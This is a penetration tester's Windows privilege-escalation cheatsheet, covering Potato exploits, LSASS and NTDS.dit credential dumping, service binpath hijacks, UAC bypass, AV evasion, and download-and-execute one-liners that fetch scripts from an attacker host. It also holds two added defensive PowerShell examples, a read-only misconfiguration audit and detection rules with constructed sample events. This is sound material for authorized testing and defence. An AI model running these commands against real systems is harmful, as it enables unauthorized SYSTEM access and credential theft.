🛡️ Methodology Checklist

  • whoami /priv → map enabled privileges to attack path
  • Get OS build number → select correct Potato variant
  • whoami /groups → check for Backup Operators, DnsAdmins, Server Operators
  • Run WinPEAS + Seatbelt + PowerUp for automated coverage
  • Credential hunt: findstr, PS history, cmdkey, KeePass, LaZagne
  • Check service/registry weak permissions via SharpUp
  • UAC bypass if user is in Administrators group
  • Document full escalation chain for report

🎯 Operational Context

Use when: Windows shell obtained — quick reference for privilege escalation enumeration sequence and tool commands. Think Dumber First: whoami /all → winpeas.exe → PowerUp.ps1 Invoke-AllChecks. Run in that order. whoami /all shows current privileges. WinPEAS highlights quick wins in red. PowerUp catches unquoted service paths and weak registry perms. Skip when: N/A — reference document.


⚡ Tactical Cheatsheet

Command | Tactical Outcome
whoami /priv | Check token privileges (SeImpersonate, SeDebug, SeTakeOwnership)
whoami /groups | Group memberships (Backup Ops, DnsAdmins, Administrators)
.\winPEASx64.exe | Full automated enumeration — start here
.\SharpUp.exe audit | Service/binary/DLL weak permissions
Get-MpComputerStatus | Defender status — plan evasion if enabled
netstat -ano | Listening ports — internal services to tunnel
cmdkey /list | Saved credentials for runas /savecred
findstr /SIM /C:"password" *.txt *.xml *.ini | Quick file-based credential search
(Get-PSReadLineOption).HistorySavePath | PowerShell history file with cleartext commands
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" | AutoLogon creds
sc.exe config [SVC] binpath= "cmd /c [CMD]" | Modify service binpath (space after = is mandatory)
.\PrintSpoofer.exe -i -c powershell.exe | SeImpersonate → SYSTEM (Server 2019+)
.\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c [CMD]" -t * | SeImpersonate → SYSTEM (Server 2016)
msiexec /i evil.msi /quiet | AlwaysInstallElevated → SYSTEM via MSI

🔬 Deep Dive & Workflow

Windows PrivEsc Decision Tree

START: whoami /priv + whoami /groups
│
├── SeImpersonatePrivilege ENABLED?
│   ├── Version < 1809 (build < 17763) → JuicyPotato.exe
│   └── Version ≥ 1809 (build ≥ 17763) → PrintSpoofer.exe / GodPotato
│
├── SeDebugPrivilege ENABLED?
│   └── Dump LSASS → Mimikatz sekurlsa::logonpasswords
│
├── SeTakeOwnershipPrivilege ENABLED?
│   └── takeown + icacls → read/replace any file
│
├── Backup Operators GROUP?
│   └── SeBackupPrivilege → copy NTDS.dit → secretsdump.py
│
├── DnsAdmins GROUP?
│   └── dnscmd /config /serverlevelplugindll → restart DNS → SYSTEM
│
├── Local Administrators GROUP (at Medium integrity)?
│   └── UAC Bypass → srrstr.dll / fodhelper → High integrity
│
├── cmdkey /list → saved creds?
│   └── runas /savecred /user:[USER] cmd.exe
│
├── AlwaysInstallElevated?
│   └── msfvenom MSI → msiexec /i → SYSTEM
│
├── Weak service permissions?
│   └── SharpUp → sc.exe config binpath= / overwrite binary
│
├── Unquoted service paths?
│   └── Plant binary in unquoted path segment → restart service
│
├── Credential files?
│   └── findstr / PSReadLine / PSCredential XML / registry
│
└── No quick win → WinPEAS full output → manual review
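The decision tree above is the attacker's view of the same misconfigurations a hardening audit should find first. The script below is an added example (not part of the original cheatsheet, and not PowerUp or SharpUp code) that performs a read-only audit for four of the branches: unquoted service paths, service binaries writable by broad principals, AlwaysInstallElevated, and a cleartext Winlogon DefaultPassword. Function names, output fields and the Fix text are this example's own; it assumes PowerShell 3+ (Get-CimInstance) and an elevated prompt on the host being assessed.

```powershell
# Added example: read-only privilege-escalation misconfiguration audit.
# Nothing on the host is modified; each finding is a small object with a suggested fix.

function Get-ServiceExecutable {
    # Return the executable portion of a service ImagePath with surrounding quotes stripped.
    param([string]$PathName)
    $m = [regex]::Match($PathName, '(?i)^"?(.*?\.exe)')
    if ($m.Success) { $m.Groups[1].Value } else { $null }
}

function Test-UnquotedServicePaths {
    # An unquoted ImagePath whose executable path contains a space is ambiguous: the SCM
    # tries each space-delimited prefix (C:\Program.exe, C:\Program Files\App.exe, ...).
    foreach ($svc in Get-CimInstance Win32_Service) {
        $p = $svc.PathName
        if (-not $p -or $p.StartsWith('"')) { continue }
        $exe = Get-ServiceExecutable $p
        if ($exe -and $exe -match '\s') {
            [pscustomobject]@{
                Check  = 'UnquotedServicePath'
                Name   = $svc.Name
                Detail = $p
                Fix    = "Quote the ImagePath under HKLM\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
            }
        }
    }
}

function Test-WritableServiceBinaries {
    # A service binary writable by a broad principal can be replaced and runs as the
    # service account (often LocalSystem) on the next start.
    $broad = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
    foreach ($svc in Get-CimInstance Win32_Service) {
        $exe = Get-ServiceExecutable $svc.PathName
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }
        $acl = Get-Acl -LiteralPath $exe -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -eq 'Allow' -and
                $broad -contains $ace.IdentityReference.Value -and
                "$($ace.FileSystemRights)" -match 'Write|Modify|FullControl') {
                [pscustomobject]@{
                    Check  = 'WritableServiceBinary'
                    Name   = $svc.Name
                    Detail = "$exe grants $($ace.FileSystemRights) to $($ace.IdentityReference)"
                    Fix    = 'Remove write/modify access for non-administrative principals'
                }
            }
        }
    }
}

function Test-AlwaysInstallElevated {
    # MSI packages install as SYSTEM only when BOTH the machine and user policy values are 1.
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
            'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $enabled = foreach ($k in $keys) {
        $v = Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        if ($v -and $v.AlwaysInstallElevated -eq 1) { $k }
    }
    if (@($enabled).Count -eq 2) {
        [pscustomobject]@{
            Check  = 'AlwaysInstallElevated'
            Name   = 'Windows Installer policy'
            Detail = 'AlwaysInstallElevated=1 in both HKLM and HKCU'
            Fix    = 'Set AlwaysInstallElevated to 0 (or remove it) via GPO in both hives'
        }
    }
}

function Test-AutoLogonPassword {
    # Same Winlogon key as the cheatsheet's reg query; report presence only, never the value.
    $k = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $w = Get-ItemProperty -Path $k -ErrorAction SilentlyContinue
    if ($w -and $w.DefaultPassword) {
        [pscustomobject]@{
            Check  = 'AutoLogonPassword'
            Name   = "$($w.DefaultUserName)"
            Detail = 'Cleartext DefaultPassword present under Winlogon'
            Fix    = 'Remove DefaultPassword; if autologon is required, store it as an LSA secret instead'
        }
    }
}

function Invoke-PrivEscAudit {
    # Aggregate all checks; empty output means none of these quick wins is present.
    @(Test-UnquotedServicePaths) + @(Test-WritableServiceBinaries) +
    @(Test-AlwaysInstallElevated) + @(Test-AutoLogonPassword)
}

Invoke-PrivEscAudit | Format-Table -AutoSize -Wrap
```

Run it as part of the regular hardening audit the Reporting Trigger recommends; each finding maps directly onto one branch of the tree, so an empty result closes those branches before a tester reaches them.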

Potato Attack Selector

OS | Build | Tool
Server 2008 / Win 7 | < 7601 | RottenPotato
Server 2016 / Win 10 | ≤ 14393 | JuicyPotato
Server 2019 / Win 10 | ≥ 17763 | PrintSpoofer, RoguePotato, GodPotato
Server 2022 | ≥ 20348 | GodPotato

File Transfer Quick Reference

# certutil (most reliable — signed MS binary)
certutil -urlcache -split -f http://[LHOST]/[FILE] C:\temp\[FILE]
 
# PowerShell
(New-Object Net.WebClient).DownloadFile('http://[LHOST]/[FILE]', 'C:\temp\[FILE]')
IEX(New-Object Net.WebClient).DownloadString('http://[LHOST]/script.ps1')
 
# Invoke-WebRequest
iwr http://[LHOST]/[FILE] -OutFile C:\temp\[FILE]
 
# SMB
net use Z: \\[LHOST]\share /user:guest ""
copy Z:\[FILE] C:\temp\
 
# Base64 encode and paste (when no network from target)
# Attacker: base64 -w 0 file.exe
# Target:   echo "[BASE64]" | base64 -d > file.exe (or use PS)
[IO.File]::WriteAllBytes("C:\temp\file.exe", [Convert]::FromBase64String("[BASE64]"))

Key LOLBAS for Payload Execution

Binary | Use
certutil.exe | Download files, base64 encode/decode
mshta.exe | Execute HTA payloads
regsvr32.exe | Execute SCT scripts via COM
rundll32.exe | Execute DLLs, JS, etc.
cmstp.exe | AppLocker bypass + UAC bypass
msiexec.exe | Execute MSI payloads
installutil.exe | Execute .NET assemblies
wmic.exe | Execute processes, XSL scripts
msbuild.exe | Build and execute C# inline tasks
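Every command in the Tactical Cheatsheet and the LOLBAS table above leaves a process-creation record (Security 4688 with command-line auditing enabled, or Sysmon Event ID 1). The following is an added example, not part of the original cheatsheet, of a small rule set that flags those command lines so the blue team can see the escalation chain as it happens. Rule names are this example's own, and the sample events are constructed (the 203.0.113.5 address is a documentation range, not a real host).

```powershell
# Added example: detection rules over process-creation command lines for the
# techniques listed in this cheatsheet. Patterns are intentionally narrow; tune
# the LOLBAS rule to your environment, it is the noisiest of the set.

$PrivEscRules = @(
    @{ Name = 'ServiceBinPathChanged';   Pattern = '(?i)\bsc(\.exe)?"?\s+config\b.*\bbinpath=' }
    @{ Name = 'DnsServerLevelPluginDll'; Pattern = '(?i)\bdnscmd(\.exe)?"?\s.*serverlevelplugindll' }
    @{ Name = 'QuietMsiInstall';         Pattern = '(?i)\bmsiexec(\.exe)?"?(?=\s).*\s/i\b.*\s/q(uiet|n)?\b' }
    @{ Name = 'RunAsSavedCred';          Pattern = '(?i)\brunas(\.exe)?"?(?=\s).*\s/savecred\b' }
    @{ Name = 'CertutilUrlFetch';        Pattern = '(?i)\bcertutil(\.exe)?"?(?=\s).*-urlcache\b.*\s-f\s+https?://' }
    @{ Name = 'LolbasScriptHost';        Pattern = '(?i)\b(mshta|regsvr32|cmstp|installutil|msbuild)(\.exe)?"?(?=\s).*\.(hta|sct|inf|xml|csproj)\b' }
    @{ Name = 'PotatoTool';              Pattern = '(?i)\b(printspoofer|juicypotato|roguepotato|godpotato)(\.exe)?\b' }
)

function Find-PrivEscIndicators {
    # $Events: objects exposing Time, User and CommandLine (the shape of the constructed
    # sample below; map your own 4688/Sysmon fields onto these three properties).
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        foreach ($r in $PrivEscRules) {
            if ($e.CommandLine -match $r.Pattern) {
                [pscustomobject]@{ Time = $e.Time; User = $e.User; Rule = $r.Name; CommandLine = $e.CommandLine }
            }
        }
    }
}

# Constructed sample: one low-privileged service account walking the cheatsheet,
# plus two benign records that must not fire.
$SampleEvents = @(
    [pscustomobject]@{ Time = '2024-05-01T09:12:03'; User = 'WEB01\svc_web'; CommandLine = '"C:\Windows\System32\sc.exe" config UpdaterSvc binpath= "cmd /c C:\Users\Public\run.bat"' }
    [pscustomobject]@{ Time = '2024-05-01T09:12:40'; User = 'WEB01\svc_web'; CommandLine = 'msiexec /i C:\Users\Public\setup.msi /quiet' }
    [pscustomobject]@{ Time = '2024-05-01T09:13:05'; User = 'WEB01\svc_web'; CommandLine = 'certutil -urlcache -split -f http://203.0.113.5/tool.exe C:\temp\tool.exe' }
    [pscustomobject]@{ Time = '2024-05-01T09:13:30'; User = 'WEB01\svc_web'; CommandLine = '.\PrintSpoofer.exe -i -c powershell.exe' }
    [pscustomobject]@{ Time = '2024-05-01T09:14:00'; User = 'WEB01\svc_web'; CommandLine = '"C:\Windows\System32\sc.exe" query UpdaterSvc' }   # benign
    [pscustomobject]@{ Time = '2024-05-01T09:15:10'; User = 'WEB01\deploy';  CommandLine = 'msiexec /i C:\Deploy\agent.msi' }                    # interactive install, benign
)

Find-PrivEscIndicators -Events $SampleEvents | Format-Table -AutoSize -Wrap
```

Four of the six sample records fire (sc config with binpath=, the quiet MSI install, the certutil fetch, and the Potato binary); the sc query and the interactive msiexec do not. Correlating a QuietMsiInstall hit with the AlwaysInstallElevated policy state from the host is what turns it from a low-confidence signal into a confirmed escalation.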

Common Service Accounts with SeImpersonate

IIS:           IIS AppPool\[APPNAME], NT AUTHORITY\IUSR
MSSQL:         NT SERVICE\MSSQLSERVER, MSSQL$INSTANCE
MySQL:         NETWORK SERVICE
Exchange:      NT AUTHORITY\NETWORK SERVICE
Jenkins:       varies — often LocalSystem or service account

🛠️ Troubleshooting & Edge Cases

Problem | Cause | Fix
winpeas.exe detected by AV | Default signature | Use PowerShell: IEX (New-Object Net.WebClient).DownloadString('http://[LHOST]/winPEASany.ps1')
PowerUp.ps1 blocked | Execution policy | Load via IEX: IEX (New-Object Net.WebClient).DownloadString('http://[LHOST]/PowerUp.ps1'); Invoke-AllChecks
whoami /all shows no special privs | Standard user token | Check if admin in local group: net localgroup administrators; or token impersonation available
Unquoted service path found but not exploitable | Cannot write to service binary dir | Need write access to one of the unquoted path directories; check each with icacls
All standard checks negative | Need deeper look | Check: DLL hijacking paths, AlwaysInstallElevated registry keys, scheduled tasks, and token impersonation

📝 Reporting Trigger

Finding Title: Windows Privilege Escalation Vector Identified
Impact: Windows system misconfiguration identified via automated and manual enumeration provides a privilege escalation path from a low-privileged user to SYSTEM or Administrator without additional exploitation.
Root Cause: System not configured against CIS Windows Benchmark. Default or misconfigured service permissions, registry ACLs, or unquoted service paths not remediated.
Recommendation: Apply CIS Windows Server Benchmark. Run PowerUp.ps1 against all systems as part of regular hardening audit. Review service configurations and registry key permissions. Implement automated misconfiguration scanning.